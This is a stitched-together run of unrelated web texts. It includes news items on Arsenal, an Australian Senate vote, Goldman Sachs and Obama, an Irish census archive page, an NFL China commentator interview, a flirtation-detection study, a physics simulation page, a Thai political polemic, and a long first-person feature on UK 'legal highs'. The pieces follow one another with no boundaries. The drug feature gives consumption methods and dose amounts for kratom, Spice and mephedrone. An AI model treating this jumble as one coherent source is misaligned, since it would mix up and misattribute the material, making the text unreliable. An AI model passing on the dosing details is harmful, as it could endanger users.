The two most common themes are science fiction and fantasy .
In this post , we take a look at 50 great examples of concept art that are sure to inspire you and let your imagination run wild .
What do you think of concept art ?
Please share other examples with us in the comments section .
I live in Seattle .
I make things .
I sell them here .
I take pictures here .
I write reviews here .
I collect inspiration here .
Census of Ireland 1901 / 1911 and Census fragments and substitutes ,
1821-51
The household returns and ancillary records for the censuses of Ireland of 1901 and 1911 , which are in the custody of the National Archives of Ireland , represent an extremely valuable part of the Irish national heritage .
Read more about their digitisation .
All thirty - two counties for 1901 and 1911 , searchable by all information categories , are now available on this site .
Corrections and improvements will be ongoing , and we are very grateful to all users who have submitted corrections to us .
A small amount of material is missing from the site , and will be placed online as soon as possible .
Surviving census fragments and substitutes for 1821 - 51 are a valuable , if limited , resource for the pre-Famine period .
Read more about these records
See User Corrections for information about data updates to the site .
Arsenal goalkeeper Vito Mannone is happy to have retained his place following the return of Manuel Almunia .
Wenger satisfied with goalkeeping options at his disposal
Difficult position
Arsenal goalkeeper Vito Mannone admits he is ' very pleased ' to have retained his place following the return to fitness of Manuel Almunia .
Mannone has started seven of the Gunners ' last eight games after being thrust into the team while Almunia was laid low with a virus and Lukasz Fabianski was sidelined by a knee injury .
Regular No.1
Almunia is now fit again , but the Spaniard has had to settle for a place on the bench for the last two matches against Birmingham City and AZ Alkmaar after Arsene Wenger kept faith with Mannone .
The young Italian is happy to have the support of the Arsenal manager and is keen to make the most of his opportunity in the first team .
" I am very pleased to keep my place , " Mannone told .
" I just keep doing what I have been doing in the last few weeks and so far the boss has chosen me so I am happy .
" I can see he has kept faith with me .
I am working hard to repay him with my performances .
" Wenger also has Wojciech Szczesny as a fourth goalkeeping option at Emirates Stadium and he is happy with the quality he has at his disposal .
" Yes , I believe we have enough quality , " said Wenger .
" Goalkeeper is a very difficult position .
Why ?
It is the only position where you have only negative stress .
People speak only about you when you have made a mistake .
" A striker has positive stress - he has a pressure to score , but if he scores he is always ' a hero ' , he is always ' fantastic ' .
" But a goalkeeper is only spoken about when he lets a goal in or when he makes a mistake and it is a difficult position . "
Wenger added : " He must be good with his feet , good with his hands , be very quick , be highly focused for 90 minutes , not make any technical mistakes and it makes the job very hard . "
A Liberal senator has crossed the floor to help seal parliamentary approval of a plan to stop charging asylum seekers and immigration detainees for their mandatory detention .
Judith Troeth rose from her seat for the vote this afternoon and walked across the chamber , in defiance of her party 's stance on the issue .
The vote went Labor 's way 34 to 30 .
Before the vote , Senator Troeth spoke strongly in favour of better treatment for refugees and asylum seekers , saying existing laws had to be changed .
" No advanced society should have on its books laws like this and so I will be supporting the Government on this bill , " she told the Senate .
How can you get high without breaking the law ?
A survey of friends and colleagues .
" Smoke nutmeg , " said an actor .
" Find a dodgy Starbucks barista who'll sell you the nitrous oxide cans they use to whip cream , " said a banker .
" Ask around for something called Methedrome , or Mephedrone , or Mephedrome , " advised an account manager .
" Lick a newt , " texted a doctor , " and do n't ask me things like this again . "
One PR directed me towards news stories about Spice , an over - the - counter smoking mixture that was reported to have effects similar to cannabis ; a web developer directed me to a recent issue of Mixmag , announcing the new popularity of " analogue drugs " such as Mephedrone ( aha ! ) in British clubs .
Something known as " that purple drank " was a favourite of American rappers in the 1990s , an A&R man told me : " I think it was a mixture of cough syrup and Sprite and it made everything move very slowly . "
A teacher remembered that a fistful of ProPlus worked when he was younger .
A civil servant had tried snorting Dreft detergent , to no effect .
I was sifting through this jumble of urban myth and murky fact when a report was forwarded to me by a medical student .
Published last month by drugs information charity DrugScope , the report stated that " legal highs " had , for the first time , made a significant impression in its annual survey of drug use .
Legal highs ?
That sounded right .
I wanted to try some .
" Go to a head shop , " said the student .
" You 'd be surprised . "
Head shops – purveyors of drug paraphernalia and herbal remedy , invariably dwelling on the edge of an urban centre , with lava lamp and glass bongs on display in the window – have never enjoyed a cast - iron reputation .
I 'd always assumed they were a bit of a racket : silly but harmless , selling ineffectual energy capsules to festival - goers , or things like privet branches and tumbleweed to credulous new agers .
When I crept cautiously into a head shop in Edinburgh and saw that there really was a ball of tumbleweed for sale , I prepared myself for the worst – to be offered a handful of magic beans in exchange for my watch , perhaps , or sold the instructions to a dangerous curse .
It may be an industry worth £ 10 m a year , according to a 2006 study , but I could n't bring myself to believe they sold anything that actually worked .
" We do n't sell much that does n't work , " an unsmiling salesman behind the counter told me , " but some things work better than others .
You 're not from the papers are you ? "
Um .
" Then I do n't want to say too much about the good stuff .
Any publicity is bad publicity as far as legal highs go . "
He did n't want to give me his name either , after a recent , unsought outing in the local press .
This was because his head shop sold Spice , a controversial smokable product that had been on the market since 2006 but had come under the spotlight in 2009 .
Spice , to almost universal surprise , had been getting people high .
Last December , after initial murmurs in Germany about the legality of its ingredients , the UK's Advisory Council for the Misuse of Drugs began investigating Spice .
In August , the Council recommended that the government ban Spice ( and derivative products like it ) , and by 2010 it will be illegal – an " unparalleled " move , according to Martin Barnes , DrugScope 's chief executive , who cannot recall another occasion in which a synthetic replica of an illegal drug has become illegal itself .
Head shops had found their breakthrough product , and quickly lost it .
Could I still buy some ?
" The company that made Spice tried changing the brand and logo a few times , and eventually sold off the recipe , " said the salesman .
" They still make it in the Dominican Republic , I think , but it 's not easy to get here any more . "
He scribbled down the phone number of a possible supplier ( " a shaman in Holland " ) and sold me a small bag of something called Kratom instead .
" It behaves like an opiate without any of the addictive qualities , " he said , charging £ 15 for a gram of the dried leaves .
" Stir the packet into a yogurt and eat it . "
Later , following his instructions , and making a gritty mess of my peach Danone , I ate the kratom .
It made me a bit fretful and urgent for an hour or two , a restlessness like that after one too many coffees , when you start to feel you ought to be writing a hit screenplay or enlisting to join wars .
Some hours passed and I took an extraordinarily colourful visit to the loo .
Was there more to legal highs , I wondered , than this ?
“ We ’re like a naughty Holland & Barrett ” : John Clarke , a pharmacology graduate , and Jo Hall have been selling legal drugs since 2006 .
Photograph : Suki Dhanda
The industry presented a friendlier , more modern face in the home of John Clarke and Jo Hall , recent graduates from Birmingham University , who run an online retailer of legal highs called Coffeesh0p.com .
The couple had propped a giant teddy bear next to a waist - high stack of Tupperware boxes containing colourful lotus leaves , powdered toadstool and Hawaiian woodrose seeds ; above a chest of drawers stuffed with cardboard envelopes of guarano pills and pre-rolled kratom joints was a poster of Sean Bean in Sharpe .
" It pays the bills , " said Clarke , 22 , who started the business three years ago when he was studying for a degree in pharmacology .
Today , his customers range from students attracted by the ease of shopping online , to professionals looking for substances that would n't show up on drug tests at work .
There was a professor from the local university who made regular purchases ; also a photographer , a shop assistant , and a yacht salesman .
" We sold to a couple in their 30s last month .
It was their anniversary , a weekend without the kids , and they wanted an interesting time .
I think you'd be surprised that our customers are not just 18 - year - olds wanting to get high .
There 's an entire culture of sensible people out there . "
I was surprised at the appearance of some of my fellow shoppers on my visit to the head shop in Edinburgh .
Yes , there was the shuffling student - type , and a group of twentysomething regulars who were pointedly told to come back later for something that could n't be sold in front of me .
But there was also a middle - aged woman , who looked for all the world like the respectable mother in an advert for margarine or a multi- surface cleaner .
" Usual ? " the salesman asked her , to which she affirmed , chatted for a minute or two about the weather , and left with three baggies of expensive Kratom .
" Legitimate transaction " is the draw , said Clarke – replacing the exchange of sweaty tenners on a street corner with a secure transaction by credit card .
I spoke to one online shopper ( who did not want to be named ) , and he agreed .
" The price of the legal smoke is about the same as high - quality marijuana gram for gram , and even more in some cases .
If these drugs were illegal they would n't be sold in anywhere near the numbers they are at the moment .
But the ease of access is a huge advantage . "
" We 're trying to sell honest people honest stuff , " said Clarke , who is galled that the law makes it impossible for him to give advice as to how to properly consume his products .
Almost everything in Clarke and Hall 's stockpile – from natural products such as Salvia divinorum , a psychoactive herb , to a synthetic snuff called Snow Blow – bore a label that warned it was " not for human consumption " .
And as we spoke , the couple were always careful to qualify any descriptions of use .
" That 's only really effective in a pipe or bong , should you smoke it …
Traditionally this would be brewed into a…
You might pipette a drop of that under your tongue , which we do n't recommend … "
This is common practice ( herbal entheogens are sold as " botanical souvenirs " , smoking mixtures as " incense " ) and it causes problems .
When gram - packs of woodrose seeds or a box of cactus bark arrive in the post , the customers will find a warning on the packet urging them to call a doctor if the product is ingested .
People panic , and think they 've been ripped off .
" We 'd rather not [ have a label ] , " Clarke said , " but if you sell it without that label it then becomes a medicine , something that has to pass tests . "
That was where Spice went wrong , explained Hall .
" They tried to change their classification from ' incense ' to ' smokable product ' , and people started taking a closer look at the ingredients . "
The closer look was fatal , scientists in Germany discovering that , far from being a completely herbal mixture , as the packet had claimed , the buds in Spice had been sprayed with a chemical called JWH - 018 , which replicates the psychoactive effects of THC ( tetrahydrocannabinol , the active chemical in cannabis ) on the brain .
Cue lockdown .
" The not - for - human - consumption thing is probably the worst thing , morally , that we do as an industry , " said Hall .
They likened their jobs to running a " naughty Holland & Barrett " , but like my salesman in Edinburgh , the couple have to play a game of avoid - the - tide with legislators : legal highs need to be effective enough to attract a market , but not effective enough to attract the eye of the Advisory Council , which becomes aware of substances when they show up in amnesty bins at clubs , or when users report to treatment centres with problems , or when the tabloids start making a stink .
In the days leading up to my visit , news had broken that two more legal substances – BZP , a stimulant similar to ecstasy , and GBL , a derivative of GHB that had caused the death of a student in April – were to be brought under the Misuse of Drugs Act alongside Spice .
" It was a blow when magic mushrooms were banned in 2005 , but the industry survived , " said Hall .
" We 're keeping our fingers crossed . "
Clarke and Hall face an unforgiving legal crunch .
" I 'm not aware of any substance being taken out of the Misuse of Drugs Act , " said Drugscope 's Martin Barnes .
" That is actually one of our concerns , that it is politically acceptable to bring substances in to the Act , or to increase their classification , but politically it does n't seem possible to downgrade classification . "
He expressed a worry that thresholds might be starting to come down too low .
" We need to have a better understanding of potential harms before making these substances illegal , with the fact that anybody caught using them will be committing a criminal offence . "
" Sitting at home , smoking a joint of Spice and watching Sharpe .
Does n't sound like much of a crime , does it ? " said Clarke .
Dr John Huffman , a 77 - year - old professor of organic chemistry , was in his office at Clemson University in South Carolina last December when he received an email from Germany .
It pointed him towards a news report in Der Spiegel , which revealed that a compound he had invented years earlier was being used in a legal smoking mixture of unusual potency .
Well , thought Dr Huffman , what took you so long ?
Huffman created JWH - 018 ( one of a hundred or so compounds known as " cannabinoids " ) in 1994 , while conducting experiments for a US research institute .
Research into cannabis - simulating substances began in the 1930s , moving through " an idiot phase when the American government planned to make ' happy moms ' in the 1950s " , to become of great interest to pharmaceutical companies in the 80s and 90s , hopeful that a medicine might be crafted that could recreate the pain - relief effects of cannabis without the intoxication .
JWH - 018 was " nothing special " , Dr Huffman remembered , " but it was one of the more potent compounds we made , and it was quite easy to make from commercially available materials .
Probably the reason it has now caught on . "
After the article in Der Spiegel , a slew of people contacted him : the military in Germany , worried about use among their troops ; drug enforcement agents and forensic scientists in the US ; and entrepreneurs from around the world , wanting to know how to make it for themselves .
To the latter , he always wrote back " Don't . "
But Dr Huffman had inadvertently jump - started an industry .
" My biggest surprise was that this all had n't happened sooner , " he told me .
" All it needed was somebody with a reasonable understanding of science to see the papers we had published and think , ' Aha ! ' "
After years of selling products that drew their effect from caffeine , or herbal combination , or simple wishful thinking , head shops found themselves with a product firmly grounded in science .
" You could make JWH - 018 for about $ 30 a gram , and a gram of the stuff would send you into oblivion forever , " said Dr Huffman .
" The enterprising chemists in China who make this stuff and sell it as plant growth hormone – yeah , right – have probably figured out an even cheaper way . "
To find some Spice for myself I had to go on a tour of Midlothian head shops ( the " shaman in Holland " had not come good ) , eventually finding some from the fugitive period when its producers were trying to evade closure .
The packet bore a different name and logo but , I was assured , contained the Spice of infamy within .
It smelled sickly sweet , heavily flavoured with the kind of synthetic fruit essence that is found in shisha tobacco , and it made my body weighty and sluggish when smoked .
I did n't feel particularly euphoric ; more disengaged so that I would n't have minded much if somebody had , say , punched me quite hard in the stomach .
Its potency was undeniable .
I could suddenly picture them all – that initial curious customer , the army officers in Germany , US drug officials and our own Advisory Council – encountering Spice for the first time and having to stifle a great guffaw .
This is legal !
" I 've lived around the world a long time , " said Dr Huffman .
" I 've come to the conclusion that if an enterprising person wants to find a new way to get high , they 're going to do it . "
There can be no better endorsement for a product that purports to make you high than for a government to confirm it does exactly that .
John Clarke and Jo Hall knew whenever Spice was in the news because they would receive a week 's worth of orders in a single day .
New customers flocked to long - ignored head shops , enticed by the Spice frenzy .
One user I spoke to said that he was so impressed by the effects of Spice he immediately went online to investigate what else was out there .
" I 'd always thought the stuff you could get from your average head shop was laughable , " said Tim , a 38 - year - old sales manager from Surrey who preferred not to give his real name .
He bought some Mephedrone , about which there had been some recent buzz ( " It seems to be the most talked about with clubbers , " Mixmag 's features editor Duncan Dick told me ) .
An amphetamine - like chemical that arrived in powdered form , it was supposed to have an effect similar to MDMA , and Tim gave it a go .
He started with a 250 mg dose , in a capsule , and the results were good – euphoria , stimulation – so he kept taking it , eventually consuming a gram in 12 hours .
" I had taken a lot of amphetamines in the past and two or three grams over an evening was a reasonable amount for me .
I was n't worried . "
But the next day , Tim woke up shaking and soaked in sweat , his heart beating frighteningly fast .
The state persisted , along with near - permanent anxiety , for days .
" I 've had comedowns in the past where you feel a bit grotty for 24 hours and then after that you feel a bit better .
This time , even a week later , I was genuinely struggling to function . "
His doctor prescribed Diazepam to calm the anxiety , but a month on , when we spoke , he was still feeling twitchy and on edge .
Tim 's error had been to base his dosage on Mephedrone 's illegal equivalents .
DrugScope 's recent survey highlighted the falling quality of street drugs as a reason why legal highs are growing in popularity .
The Mephedrone Tim took was far cleaner than anything he was likely to have bought from a dealer .
It had not been cut with chalk , or mashed - up aspirin , or Dreft detergent ; it had been mass - produced in a factory , probably in China , imported by a wholesaler , and sold to him by a head shop – pure .
He posted a description of his experience on an online drug forum , to warn others about making the same misjudgment .
This is another advantage of legal highs , according to Clarke .
When people have better evidence as to what they 've taken – because a substance bears a brand name , or because it is produced in a factory to roughly the same strength from dose to dose – effects can be compared with some kind of accuracy .
Sites such as Drugs - Forum.com and Erowid.org throb with testimonials and advice .
" With generic ecstasy there are so many different pills out there with different things in them that their effect is not going to be consistent , " says Clarke .
" It makes similar discussion almost impossible . "
Most predict that Mephedrone will be the next substance to come under government review ( " I imagine most users will be stockpiling supplies before the inevitable , " said Mixmag 's Duncan Dick ) .
Martin Barnes told me that , even in the week leading up to our conversation , DrugScope had received an increase in calls from treatment centres , asking for information about the drug .
" I do n't want to give the impression that there are all these laboratories furiously trying to come up with new chemicals , " he said .
" But the traditional perception of what we meant by legal highs is changing .
Head shops are selling more than just Kratom or Salvia , stuff to take to music festivals with a niche appeal .
Spice and Mephedrone are something quite different , a couple of molecular tweaks away from controlled substances .
That 's a big challenge for legislators . "
Mephedrone was the final legal high I tried .
Already nervous after listening to Tim 's tale , I was ratcheted up to a state of sheer terror by a warning from the salesman in Edinburgh that he knew it to be horribly addictive ( " Should you decide to take it , which we do n't recommend … " ) .
But my experience was actually very pleasant .
Even a relatively small dose had a significant effect : the urge to participate in every conversation in the room , the sudden conviction that I should have always known that it felt good to move my eyeballs around in their sockets .
I took it with friends , many of those who had once suggested I smoke nutmeg , or tap up a dodgy barista for his whipped - cream can .
All reported similar effects , and all asked the same question : " Is this really legal ? " ★
Goldman Sachs has defended a secretive trading practice which has come under fire from the Securities and Exchange Commission ( SEC ) .
Last week , the SEC voted unanimously to increase the transparency of so - called dark pools , which are anonymous trading platforms where buyers and sellers can keep the details of prices and deals secret from the wider public .
Goldman Sachs told the SEC that dark pools were beneficial to investors and traders as they reduced transaction costs and increased competition , bringing more liquidity to global financial markets .
But the SEC has proposed that information about investments be made public , as well as requiring those operating dark pools to identify themselves to the public whenever they make a trade .
Mary Schapiro , chairman of the SEC , said : " We should never underestimate or take for granted the wide spectrum of benefits that come from transparency , which plays a vital role in promoting public confidence in the honesty and integrity of financial markets . "
Earlier this month , the SEC 's new hard line on financial institutions and their practices saw an investigation by the body lead to the arrest of billionaire hedge fund manager Raj Rajaratnam on insider trading charges .
By Gary Cooper
In American sports broadcasting , there ’s no seat more coveted than one in the broadcast booth of Monday Night Football , the thirty - nine - year old , once - per - week franchise for which ESPN pays US $ 1.1 billion per season .
Over the years , it ’s been home to some of the very best in American sports broadcasting ( Al Michaels and John Madden most recently ) , and some of the most bizarre ( Howard Cosell and Dandy Don Meredith ) .
But no matter who occupies that booth , the job remains essentially the same : entertaining one of America ’s few remaining mass audiences , while serving its varying expectations , and understandings , of American football .
That ’s really hard .
But I argue it ’s nothing compared to what Zhang Nan , the twenty - eight - year - old play - by - play man for NFL China ’s weekly live streaming simulcast of Monday Night Football on Sina.com , faces on a weekly basis [ directions for watching the broadcast , here ] .
Sure , the NFL has a small audience in China ( roughly 20,000 viewers watch the weekly simulcast ) , but Zhang – as the play - by - play man – has a key role in helping the NFL expand it .
And in doing so , it ’s partly his responsibility to figure out a way to translate this most American of sports to a Chinese audience that has almost no knowledge or experience with it .
The challenge is technical , cultural , and linguistic , and on Wednesday afternoon I spoke to Zhang ( to the right of his broadcast partner , Guo Aibing , in the photo below ) about how he handles the responsibilities .
The conversation ranged over a number of topics , and shifted between Chinese and English .
As a result , I ’ve edited the transcript a bit , for clarity , and rearranged some of the questions .
But the words , as best as I was able to record them , are accurate .
Our interview was arranged and joined by Michael Stokes , Managing Director of NFL China .
At a couple of points he interjected some thoughts , and I ’ve added those to the edited transcript .
But mostly , this is about Zhang Nan .
Born in Beijing , he attended the Beijing Sports University where he majored in Physical Education , with a specialization in basketball .
During his senior year – only five years ago !
– he was introduced to American football via the NFL ’s youth flag football program .
That program , which has had success in expanding the league ’s appeal inJapan , is designed to introduce middle - school and college - aged students to football and NFL fan - dom .
Zhang , after graduation , joined a sports marketing firm that worked with the NFL on promoting the program , and today he works for another sports marketing firm – Key Solutions – where he continues to work on NFL promotions , including the flag football program ( which is coming to Shanghai this weekend – see the end of this post for details ) .
Anyway , to the interview :
SCRAP : American football is a complicated game with rules that sometime bewilder even its most devoted fans .
As a result , many of those fans – me , included – tend to believe that you really need to grow up with the game to love it .
But clearly , that ’s not the case with you .
So how did you come to learn the game , and enjoy it ?
ZHANG : Five years ago , there were n’t any real football teachers or instructors or coaches in China .
Working with the NFL Flag Football program , what we did initially was go to the language universities , and seek out foreign students and American students teaching in China .
We really depended on their expertise .
They would act as the head coaches , and the Chinese would be assistant coaches .
That helped us to learn as we expanded the Flag Football program , and that ’s how I began to appreciate it .
You could n’t see it on TV , but it was new and exciting .
SCRAP : So it was n’t the sport so much , it was being a part of something new ?
ZHANG : It was n’t just that it was a new sport .
As I learned more , bits and pieces , I began to see the value in the sport .
I also began to see it as a way to get people into fitness .
The athleticism was attractive .
As I became more knowledgeable about the sport , the process of sharing that knowledge [ through the flag football program , among other ways ] really engaged me .
SCRAP : It ’s a big leap to go from working sports marketing to being a commentator on Monday Night Football .
Could you give me a sense of how that happened ?
STOKES : Maybe I could jump in here .
We ’ve known and worked with Zhang Nan for five years .
And he stood out .
You know , you can always tell someone who is passionate about a sport .
They ’re passionate .
Working on the flag football program , he treated it as more than just an introductory sports marketing job .
There ’s a passion for the sport there .
You could him seeking out content online , or whatever the case may be .
So it came about over time , because of a long - standing relationship .
And also because of the passion there .
SCRAP : Zhang Nan , when you were first offered the job , it must have seemed daunting .
What did you see as the biggest challenge ?
ZHANG : For me , the biggest challenge is that there is n’t a lot of Chinese background information on these games .
So doing the background research , translating the language into something that the Chinese understand , those are the challenges .
You ca n’t translate John Madden word for word and expect a Chinese audience to understand it .
You know , it ’s not like in the US where a person can go and find all of these channels telling you what ’s happening in the NFL .
I have to seek out resources , ESPN , say , to put these stories together to help the Chinese audience understand what ’s happened historically , and this week .
Another big challenge is finding a balance between talking simply to beginning NFL fans , and talking too much about certain players , teams , and strategies for more advanced fans .
If I make it too simple , then the actual fans find the broadcast boring .
If I make it more advanced , we lose new fans .
SCRAP : So what is it about the NFL that attracts Chinese fans ?
ZHANG : Our target demographic is 18 - 30 year olds .
In my opinion what attracts our demo is that the NFL is very unique to Chinese eyes .
The teamwork aspect , in particular , the fact that all 11 people are working toward one common goal is attractive .
Also , the game is very physical , and in that way it ’s very different from anything that a Chinese person has seen or done in the sports arena .
SCRAP : From the perspective of a broadcaster and sports marketer , what aspects of American football most appeal to Chinese fans ?
ZHANG : Right now , the development is still in the early stages .
But for the new Chinese fans , the contact at the line of scrimmage , the fact that there ’s tackling , the physical contact , makes people look twice .
Also , the size of the players – that gets people to look twice .
All of those of factors are unique and new to China .
The knowledge level just is n’t where it is in the States .
So there ’s less focus on strategy .
Instead , two lines of men crashing into each other , that gets attention .
SCRAP : So the “ warrior ” aspect of the game is a big part of the appeal .
ZHANG : Yeah , in China there is n’t anybody like these NFL athletes .
Now , in terms of my flag football training program .
Yes , the kids are practicing for a game , but the end result is n’t what matters .
Instead , the fact that somebody is taking time to help them become a better athlete is matters .
Really , the Chinese students are grateful for that more than anything .
The fact that they get to work - out a few hours per day and have somebody work with them – that matters a lot .
So that attracts them , too .
SCRAP : Football , in many ways , is such a technical game , especially when it comes to vocabulary .
How do you handle those translations ?
For example , what is the Chinese equivalent of the “ Wildcat ” offense ?
ZHANG : Good question .
A lot of terms are translated literally .
Like “ Wildcat . ” I call it yemao [ 野貓 ] .
Other terms , more technical ones , I go back to the English .
For example , Cover 2 , Cover 3 – I say those in English and the serious fans understand what I ’m talking about .
But , then again , the casual fans drop off .
So the play calling and the terminology has to have a middle ground .
It ’s not so easy to make the choices .
SCRAP : Among many sports marketing people in the West , in particular , it ’s widely believed that Chinese people only like to watch sports with Chinese athletes .
For example , the NBA was popular in China before Yao Ming , but it became much more so afterward .
With that in mind , do you think the NFL can attract Chinese fans to a sport in which it ’s unlikely that we ’ll see Chinese professionals any time soon ?
ZHANG : Yes , the NBA has its Chinese stars like Yao Ming .
But even before Yao , people watched the NBA .
They had Michael Jordan .
It was kind of a different level of interest , though .
People watched because it was interesting and unique .
Then , when Yao entered the league , it became a “ I kind of can do it , too ” kind of mentality .
The NFL is moving along a similar path .
We ’re doing the same kind of thing – featuring Tom Brady , Peyton Manning , stars .
I ’m focusing on star players , certain teams – like the New England Patriots .
Helping people know the teams , players , and then we can go broader and deeper .
SCRAP : What kind of feedback are you getting from the Chinese fans who watch the Sina broadcast ?
STOKES : One of the great things about the sina.com stream is that we have a real - time chat going during the broadcast , and we literally have out people monitoring the conversation and feedback in the chatrooms .
So if someone asks “ Why did they go for 4th and 1 there ? ” we can pass that on to Zhang Nan and his counterpart .
We feed instructions and comments to Zhang in his earpiece , and he can answer them in the course of the broadcast .
ZHANG : During the broadcast I follow the feedback happening in the chatroom on my laptop .
I ’ve found there are three types of people chatting there .
First , there are people who are new to the game .
They want to be educated , and they ’ll complain that I ’m being too technical .
Second , on the other side , are the hardcore fans .
They ’ll demand more information and they ’ll say , “ You ’re too shallow with your commentating . ”
Third , there are the people in the middle who know a little about the game , and they want me to be more passionate .
And this is because they ’ve seen broadcasts of football games via ESPN , or online , and they ’ve seen and know US style commentating , which is more emotional and expressive .
Frankly , I do n’t consider myself emotive and expressive .
But they really want that passion
SCRAP : They want that American style , passionate commentating .
ZHANG : Right .
What I try to do when I commentate is to create an environment such that the fans chatting feel like they ’re at home with friends , talking about the game .
I want the broadcast to be more of a conversation .
Guo [ Zhang ’s partner ] is more knowledgeable about the game ’s history and background , and he ’s more emotive .
I see myself as more of a play - by - play commentator who answers the questions that people have in their head .
I want it to be more of a conversation .
SCRAP : Out of curiosity , do you have favorite teams and players ?
ZHANG : I ’m a Pittsburgh Steelers fan , and Troy Polamalu is my favorite player .
SCRAP : Well , you know , I ’m a lifelong Vikings fan , and the Steelers and Vikings play this weekend .
ZHANG : [ Laughs ]
— — — — — — — — — — — — — — — — — — — — —— ——
Sina ’s live stream of Monday Night Football is available on Tuesday mornings at 8:30 AM , China time , here .
Instructions on how to watch the broadcast can be found here ( you ’ll need to use Internet Explorer and a plug - in ) .
Sunday Night Football is available on Monday mornings , 7:30 AM , China time , in Shanghai on SMG , GDTV in Guangzhou , and nationwide by logging into QQ , here .
You must agree to install the QQ LIVE player .
Finally , CCTV 5 broadcasts a weekly , half - hour NFL highlights program at 11:30 PM on Thursday nights .
Starting October 29 , the program will be preceded by a “ NFL Blitz , ” a specially produced NFL reality program recently written up in the Washington Post .
I ’ve always been a fan of the MIT Media Lab , and in BLONDES I write about Media Lab director Alex Pentland ’s development of a machine that tracks “ vocal body language ” — pitch , speed , the space between words , and so on .
Tested in a speed dating study , the machine had an impressive accuracy rate .
About 70 percent of the time it could predict whether a man and woman was interested in each other , and whether they ’d say yes to a second date .
Now it turns out that researchers at Stanford are following suit , in what may someday be the next big iPhone app .
Computer scientist Rajesh Ranganath and his colleagues developed a “ flirtation - detection machine ” that — based on prosodic , dialogue , and lexical clues — can detect a speaker ’s intent to flirt with up to 71.5 percent accuracy .
( In contrast , men were only 56.2 percent accurate when assessing if their date was flirting with them , and women were only 62.2 percent accurate . )
Results were derived by testing the machine ’s analysis against the self - reported intentions and perceptions of men and women on a speed date .
Without going into the technical details of the study , here are a few of the findings :
1 . [ When flirting ] , men ask more questions , and use more “ you ” and “ we . ”
They laugh more , and use more sexual , anger , and negative emotional words .
Prosodically they speak faster , with higher pitch , but quieter [ softer voice ] ( lower intensity min ) .
2 . [ When flirting ] , women use more “ I ” and less “ we ” ; men use more “ we ” and “ you ” .
Men labeled as flirting are softer , but women labeled as flirting are not .
Women who say they are flirting have a much expanded pitch range ( lower pitch min , higher pitch max ) , laugh more , use more “ I ” and “ well , ” use repair questions ( Excuse me ? ) but not other kinds of questions , use more sexual terms , use far less appreciations ( Wow , That ’s true , Oh , great ) and backchannels ( Uh- huh. , Yeah . , Right. , Oh , okay . ) , and use fewer , longer turns , with more words in general [ than do men ] .
3 . Both genders convey intended flirtation by laughing more , speaking faster , and using higher pitch .
However , we do find gender differences ; men ask more questions when they say they are flirting , women ask fewer , although they do use more repair questions , while men do not .
Interestingly , the device was able to predict flirtation in men with greater accuracy than in women ( 79.5 percent versus 68.0 percent ) .
In BLONDES I write about evolution and men ’s overperception bias ; essentially , guys are wired to think women are into them when they are not .
I wonder if this is also true of the machines men make .
Roller Coaster with Two Balls
English German previous next
Sim
Graph
Time Graph
Multi Graph
show sim terminal
command >
This simulation shows 2 balls on a roller coaster track .
The 2 balls are connected by a spring .
You can change the track shape by clicking a button below .
You can drag either ball with your mouse to change the starting position .
Try changing gravity , damping or spring stiffness .
The math behind the simulation is shown below .
Also available are : open source code , documentation and a simple - compiled version which is more customizable .
hump
loop - the - loop
circle
Lemniscate
oval
spiral
Physics
This simulation is a variation of the Roller Coaster with Spring , please see that page for more information on the physics and how the simulation is done .
The difference here is that the other end of the spring is attached to another ball on the track , instead of being fixed .
We have 4 variables in this simulation :
p 1 = position on the track of ball 1 ( measured by path length along the track )
= position on the track of ball 1 ( measured by path length along the track ) v 1 = velocity of ball 1
= velocity of ball 1 p 2 = position on the track of ball 2
= position on the track of ball 2 v 2 = velocity of ball 2
The force equations for each ball are identical to that shown in the Roller Coaster with Spring simulation except that the position of the " fixed end " of the spring is replaced by the position of the other ball .
This web page was first published October 2002 .
The pro-drug legalization , pro-immigration , small government budget hawk and former governor of New Mexico looks to be preparing for a run .
Gary Johnson is preparing to launch his Our America PAC shortly , as soon as he gets all of his legal ducks in a row .
He will be hitting the trail hard soon , traveling the country to speak in support of issues and candidates , re-immersing himself in the public policy debate .
This December , Governor Johnson will also be releasing a book entitled " Seven Principles Of Good Government , " published by The Heartland Institute ( a conservative - libertarian think tank ) .
Perhaps the president wo n’t be golfing after all .
The White House is expected to announce today that President Obama will be attending the annual HRC dinner in Washington , DC on Saturday evening , the day prior to the National Equality March .
Mr. Obama ’s appearance on Saturday at the annual dinner for the Human Rights Campaign , a leading gay rights advocacy group , represents a significant show of support for gay rights at a time when many prominent gay and lesbian activists have been questioning the president ’s commitment to their issues .
Many gay rights activists have become increasingly vocal about their frustration over what they see as tepid support from Mr. Obama .
While the president has professed support for overturning the ban on gays in the military and called the law that precludes federal recognition of same - sex marriages discriminatory , he has not engaged on gay rights issues as actively as some had hoped .
The Justice Department is defending the federal marriage law , known as Defense of Marriage Act , much to the dismay of many gay rights advocates .
And Mr. Obama has been noncommittal about when he will move to end the “ do n’t ask do n’t tell ” policy .
In June , he acknowledged their irritations at the slow pace of change at a gathering of about 250 gay rights leaders who had been invited to the White House .
While it remains to be seen what Mr. Obama ’s appearance at the dinner will do to his standing in the eyes of gay rights activists , his speech may mollify some of their concerns .
His appearance will mark only the second time a sitting president has spoken to the Human Rights Campaign .
The first time was in 1997 when Bill Clinton spoke to the group .
That was the first time a sitting president had ever addressed a gay rights organization .
PAD organised a demonstration on September 19 to attack Cambodian villagers at the ancient Kao Prawiharn [ Preah Vihear ] temple inside Cambodia .
Here a knife - weilding
Thai chauvinist attempts to attack the villagers while riot cops look on .
Photo : AP .
[ See also ``Thailand : The September 19 coup , three years on ' ' . ]
By Giles Ji Ungpakorn
September 21 , 2009 --
On the September 19 , 2009 , the third anniversary of the military coup that wrecked Thai democracy , two demonstrations took place .
They sum up the two faces of Thailand .
One demonstration , by tens of thousands of ``Red Shirts '' in Bangkok , was organised in order to continue the demand full democracy .
It was a peaceful and friendly demonstration .
Yet the military - backed Democrat Party government , headed by Abhisit Vejjajiva , declared a state of emergency and lined up thousands of police and soldiers to deal with the demonstrators .
Previously , in April , Abhisit had urged soldiers to fire on the Red Shirts .
Two people were subsequently killed and 70 injured by government soldiers .
The other demonstration was organised by fascist thugs of the People 's Alliance for Democracy .
The PAD are the ``Yellow Shirt '' royalists .
The aim of this demonstration was to attack Cambodian villagers living and working at the ancient Kao Prawiharn [ Preah Vihear ] temple inside Cambodia .
Since last year , the PAD have been trying to cause a war with Cambodia by whipping up extreme nationalism .
The temple was built by the ancient Khmers and clearly belongs to Cambodia , both from a legal and historical point of view .
On September 19 , the PAD went to the border armed , as usual , with guns , bombs and clubs .
